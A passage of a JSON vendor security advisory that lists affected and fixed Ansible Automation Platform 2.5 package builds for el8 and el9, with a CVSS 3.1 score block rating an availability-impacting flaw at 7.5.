"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
